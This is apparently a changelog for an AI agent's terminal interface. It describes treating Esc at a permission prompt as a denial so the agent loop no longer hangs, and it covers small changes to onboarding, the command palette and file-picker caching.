Esc during a permission prompt
Aborting the run left the prompt's promise unsettled, so the agent loop parked on it forever: the turn never finished, `busy` never cleared, and the input stayed locked. cancelPermission() settles it with 'no' — the honest answer, since the user cancelled rather than approved — before the abort fires.

Onboarding and input bar
- COMMANDS moves to constants.ts as the single source of truth; the palette filters it and the welcome card quotes a subset by name, so a description edited in one place updates both.
- The welcome card gains a compact variant and shows the provider; the empty-state hint list and the standalone "type / to see commands" line are gone, replaced by a placeholder and one line of key hints under the input bar.
- Command palette spans the full width instead of floating inset.

File picker
Cache gains a 2s TTL and invalidateFileCache(), called when the '@' that opens a mention is typed, so a picker opened just after creating a file actually lists it.